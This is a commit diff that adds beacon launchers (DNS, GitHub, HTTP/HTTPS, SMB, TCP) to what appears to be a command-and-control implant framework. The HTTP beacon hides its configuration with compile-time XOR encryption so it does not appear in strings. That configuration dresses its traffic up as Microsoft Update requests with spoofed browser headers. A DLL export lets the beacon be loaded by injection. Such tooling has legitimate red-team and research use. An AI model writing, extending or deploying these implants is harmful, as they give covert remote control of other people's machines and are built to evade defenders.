Beacon launcher move

maxdcb · maxdcb · commit bf04b89d56a6 · 2024-12-06T09:50:46.000-05:00
diff --git a/CMakeLists.txt b/CMakeLists.txt
@@ -56,4 +56,6 @@ if(WITH_TESTS)
     add_subdirectory(core/listener/tests)
 endif()
 
-
+include_directories(core/beacon)
+include_directories(core/modules/ModuleCmd)
+add_subdirectory(beacon/beacon)
diff --git a/beacon/beacon/BeaconDnsLauncher.cpp b/beacon/beacon/BeaconDnsLauncher.cpp
@@ -0,0 +1,21 @@
+#include "BeaconDns.hpp"
+
+
+using namespace std;
+
+
+int main(int argc, char* argv[])
+{	
+	std::string dnsServer = "";
+	if(argc > 1)
+		dnsServer = argv[1];
+
+	std::string domain = "";
+	if (argc > 2)
+		domain = argv[2];
+
+	std::unique_ptr<Beacon> beacon;
+	beacon = make_unique<BeaconDns>(dnsServer, domain);
+
+	beacon->run();
+}
diff --git a/beacon/beacon/BeaconGithubLauncher.cpp b/beacon/beacon/BeaconGithubLauncher.cpp
@@ -0,0 +1,21 @@
+#include "BeaconGithub.hpp"
+
+
+using namespace std;
+
+
+int main(int argc, char* argv[])
+{	
+	std::string project = "";
+	if(argc > 1)
+		project = argv[1];
+
+	std::string token = "";
+	if (argc > 2)
+		token = argv[2];
+
+	std::unique_ptr<Beacon> beacon;
+	beacon = make_unique<BeaconGithub>(project, token);
+
+	beacon->run();
+}
diff --git a/beacon/beacon/BeaconHttpLauncher.cpp b/beacon/beacon/BeaconHttpLauncher.cpp
@@ -0,0 +1,188 @@
+#include "BeaconHttp.hpp"
+
+
+using namespace std;
+
+
+// XOR encrypted at compile time, so don't appear in string
+// size of the config contained between () must be set in the compileTimeXOR template function
+constexpr std::string_view _BeaconHttpConfig_ = R"({
+    "ListenerHttpConfig": [
+        {
+            "uri": [
+                "/MicrosoftUpdate/ShellEx/KB242742/default.aspx",
+                "/MicrosoftUpdate/ShellEx/KB242742/admin.aspx",
+                "/MicrosoftUpdate/ShellEx/KB242742/download.aspx"
+            ],
+            "client": [
+                {
+                    "headers": [
+                        {
+                            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
+                        },
+                        {
+                            "Connection": "Keep-Alive"
+                        },
+                        {
+                            "Content-Type": "text/plain;charset=UTF-8"
+                        },
+                        {
+                            "Content-Language": "fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7"
+                        },
+                        {
+                            "Authorization": "YWRtaW46c2RGSGVmODQvZkg3QWMtIQ=="
+                        },
+                        {
+                            "Keep-Alive": "timeout=5, max=1000"
+                        },
+                        {
+                            "Cookie": "PHPSESSID=298zf09hf012fh2; csrftoken=u32t4o3tb3gg43; _gat=1"
+                        },
+                        {
+                            "Accept": "*/*"
+                        },
+                        {
+                            "Sec-Ch-Ua": "\"Not.A/Brand\";v=\"8\", \"Chromium\";v=\"114\", \"Google Chrome\";v=\"114\""
+                        },
+                        {
+                            "Sec-Ch-Ua-Platform": "Windows"
+                        }
+                    ]
+                }
+            ]
+        }
+    ],
+    "ListenerHttpsConfig": [
+        {
+            "uri": [
+                "/MicrosoftUpdate/ShellEx/KB242742/default.aspx",
+                "/MicrosoftUpdate/ShellEx/KB242742/upload.aspx",
+                "/MicrosoftUpdate/ShellEx/KB242742/config.aspx"
+            ],
+            "client": [
+                {
+                    "headers": [
+                        {
+                            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
+                        },
+                        {
+                            "Connection": "Keep-Alive"
+                        },
+                        {
+                            "Content-Type": "text/plain;charset=UTF-8"
+                        },
+                        {
+                            "Content-Language": "fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7"
+                        },
+                        {
+                            "Authorization": "YWRtaW46c2RGSGVmODQvZkg3QWMtIQ=="
+                        },
+                        {
+                            "Keep-Alive": "timeout=5, max=1000"
+                        },
+                        {
+                            "Cookie": "PHPSESSID=298zf09hf012fh2; csrftoken=u32t4o3tb3gg43; _gat=1"
+                        },
+                        {
+                            "Accept": "*/*"
+                        },
+                        {
+                            "Sec-Ch-Ua": "\"Not.A/Brand\";v=\"8\", \"Chromium\";v=\"114\", \"Google Chrome\";v=\"114\""
+                        },
+                        {
+                            "Sec-Ch-Ua-Platform": "Windows"
+                        }
+                    ]
+                }
+            ]
+        }
+    ]
+})";
+
+constexpr std::string_view keyConfig = ".CRT$XCL";
+
+// compile time encryption of http configuration
+constexpr std::array<char, 3564> _EncryptedBeaconHttpConfig_ = compileTimeXOR<3564, 8>(_BeaconHttpConfig_, keyConfig);
+
+
+int main(int argc, char* argv[])
+{	
+	std::string ip = "...";
+	if(argc > 1)
+		ip = argv[1];
+
+	int port = 8443;
+	if (argc > 2)
+		port = atoi(argv[2]);
+
+	bool https = false;
+	if (argc > 3)
+	{
+		std::string sHttps = argv[3];
+		if(sHttps=="https")
+			https=true;
+		else if(sHttps=="http")
+			https=false;
+	}
+
+	// decrypt HttpConfig
+    std::string configDecrypt(std::begin(_EncryptedBeaconHttpConfig_), std::end(_EncryptedBeaconHttpConfig_));
+    std::string key(keyConfig);
+    XOR(configDecrypt, key);
+
+	std::unique_ptr<Beacon> beacon;
+	beacon = make_unique<BeaconHttp>(configDecrypt, ip, port, https);
+
+	beacon->run();
+}
+
+
+#ifdef __linux__
+#elif _WIN32
+
+extern "C" __declspec(dllexport) int go(PCHAR argv)
+{
+    // OutputDebugStringA("HelperFunc was executed");
+    // OutputDebugStringA(argv);
+
+    std::vector<std::string> splitedCmd;
+    std::string delimiter = " ";
+    splitList(argv, delimiter, splitedCmd);
+
+    // OutputDebugStringA(splitedCmd[0].c_str());
+    // OutputDebugStringA(splitedCmd[1].c_str());
+    // OutputDebugStringA(splitedCmd[2].c_str());
+
+    if (splitedCmd.size() == 3)
+    {
+        std::string ip = splitedCmd[0];
+        int port = -1;
+        try
+        {
+            port = stoi(splitedCmd[1]);
+        }
+        catch (...)
+        {
+            return 1;
+        }
+
+        bool https = true;
+		std::string sHttps = splitedCmd[2];
+		if(sHttps=="https")
+			https=true;
+
+        // decrypt HttpConfig
+		std::string configDecrypt(std::begin(_EncryptedBeaconHttpConfig_), std::end(_EncryptedBeaconHttpConfig_));
+		std::string key(keyConfig);
+		XOR(configDecrypt, key);
+
+		std::unique_ptr<Beacon> beacon;
+		beacon = make_unique<BeaconHttp>(configDecrypt, ip, port, https);
+
+		beacon->run();
+	}
+
+    return 0;
+}
+
+#endif
diff --git a/beacon/beacon/BeaconSmbLauncher.cpp b/beacon/beacon/BeaconSmbLauncher.cpp
@@ -0,0 +1,17 @@
+#include "BeaconSmb.hpp"
+
+
+using namespace std;
+
+
+int main(int argc, char* argv[])
+{	
+	std::string pipeName = "mynamedpipe";
+	if(argc > 1)
+		pipeName = argv[1];
+
+	std::unique_ptr<Beacon> beacon;
+	beacon = make_unique<BeaconSmb>(pipeName);
+
+	beacon->run();
+}
diff --git a/beacon/beacon/BeaconTcpLauncher.cpp b/beacon/beacon/BeaconTcpLauncher.cpp
@@ -0,0 +1,21 @@
+#include "BeaconTcp.hpp"
+
+
+using namespace std;
+
+
+int main(int argc, char* argv[])
+{	
+	std::string ip = "127.0.0.1";
+	if(argc > 1)
+		ip = argv[1];
+
+	int port = 4444;
+	if (argc > 2)
+		port = atoi(argv[2]);
+
+	std::unique_ptr<Beacon> beacon;
+	beacon = make_unique<BeaconTcp>(ip, port);
+
+	beacon->run();
+}
diff --git a/beacon/beacon/CMakeLists.txt b/beacon/beacon/CMakeLists.txt
@@ -0,0 +1,50 @@
+set(SOURCES_BEACON_HTTP_LAUNCHER
+	BeaconHttpLauncher.cpp
+)
+add_executable(BeaconHttp ${SOURCES_BEACON_HTTP_LAUNCHER} project.rc)
+set_property(TARGET BeaconHttp PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded")
+target_link_libraries(BeaconHttp BeaconHttpLib)
+add_custom_command(TARGET BeaconHttp POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 
+$<TARGET_FILE:BeaconHttp> "${CMAKE_SOURCE_DIR}/Release/Beacons/$<TARGET_FILE_NAME:BeaconHttp>")
+
+
+set(SOURCES_BEACON_TCP_LAUNCHER
+BeaconTcpLauncher.cpp
+)
+add_executable(BeaconTcp ${SOURCES_BEACON_TCP_LAUNCHER} project.rc)
+set_property(TARGET BeaconTcp PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded")
+target_link_libraries(BeaconTcp BeaconTcpLib)
+add_custom_command(TARGET BeaconTcp POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 
+$<TARGET_FILE:BeaconTcp> "${CMAKE_SOURCE_DIR}/Release/Beacons/$<TARGET_FILE_NAME:BeaconTcp>")
+
+
+set(SOURCES_BEACON_GITHUB_LAUNCHER
+BeaconGithubLauncher.cpp
+)
+add_executable(BeaconGithub ${SOURCES_BEACON_GITHUB_LAUNCHER} project.rc)
+set_property(TARGET BeaconGithub PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded")
+target_link_libraries(BeaconGithub BeaconGithubLib)
+add_custom_command(TARGET BeaconGithub POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 
+$<TARGET_FILE:BeaconGithub> "${CMAKE_SOURCE_DIR}/Release/Beacons/$<TARGET_FILE_NAME:BeaconGithub>")
+
+
+set(SOURCES_BEACON_SMB_LAUNCHER
+	BeaconSmbLauncher.cpp
+)
+add_executable(BeaconSmb ${SOURCES_BEACON_SMB_LAUNCHER} project.rc)
+set_property(TARGET BeaconSmb PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded")
+target_link_libraries(BeaconSmb BeaconSmbLib)
+add_custom_command(TARGET BeaconSmb POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 
+$<TARGET_FILE:BeaconSmb> "${CMAKE_SOURCE_DIR}/Release/Beacons/$<TARGET_FILE_NAME:BeaconSmb>")
+
+
+
+set(SOURCES_BEACON_DNS_LAUNCHER
+	BeaconDnsLauncher.cpp
+)
+add_executable(BeaconDns ${SOURCES_BEACON_DNS_LAUNCHER} project.rc)
+set_property(TARGET BeaconDns PROPERTY MSVC_RUNTIME_LIBRARY "MultiThreaded")
+target_link_libraries(BeaconDns BeaconDnsLib)
+add_custom_command(TARGET BeaconDns POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy 
+$<TARGET_FILE:BeaconDns> "${CMAKE_SOURCE_DIR}/Release/Beacons/$<TARGET_FILE_NAME:BeaconDns>")
+
diff --git a/beacon/beacon/project.rc b/beacon/beacon/project.rc
@@ -0,0 +1,42 @@
+#include <winver.h>
+
+#define VER_FILEVERSION             1,0,0,0
+#define VER_FILEVERSION_STR         "1.0.0.0\0"
+
+#define VER_PRODUCTVERSION          1,0,0,0
+#define VER_PRODUCTVERSION_STR      "1.0.0\0"
+
+#ifndef DEBUG
+#define VER_DEBUG                   0
+#else
+#define VER_DEBUG                   VS_FF_DEBUG
+#endif
+
+VS_VERSION_INFO VERSIONINFO
+FILEVERSION     VER_FILEVERSION
+PRODUCTVERSION  VER_PRODUCTVERSION
+FILEFLAGSMASK   VS_FFI_FILEFLAGSMASK
+//FILEFLAGS       (VER_PRIVATEBUILD|VER_PRERELEASE|VER_DEBUG)
+FILEOS          VOS__WINDOWS32
+FILETYPE        VFT_APP
+FILESUBTYPE     VFT2_UNKNOWN
+BEGIN
+    BLOCK "StringFileInfo"
+    BEGIN
+        BLOCK "040904E4" // United States (English)
+        BEGIN
+            VALUE "CompanyName",      "Your Company Name\0"
+            VALUE "FileDescription",  "ProjectX Executable\0"
+            VALUE "FileVersion",      VER_FILEVERSION_STR
+            VALUE "InternalName",     "ProjectX\0"
+            VALUE "OriginalFilename", "ProjectX.exe\0"
+            VALUE "ProductName",      "ProjectX\0"
+            VALUE "ProductVersion",   VER_PRODUCTVERSION_STR
+        END
+    END
+
+    BLOCK "VarFileInfo"
+    BEGIN
+        VALUE "Translation", 0x409, 1252
+    END
+END
diff --git a/core b/core
@@ -1 +1 @@
-Subproject commit 71bfedd8bf0608211b6455e1d0c017f6a3df3353
+Subproject commit a68e677f062d2108d50ee167d803ece9e4a5260f
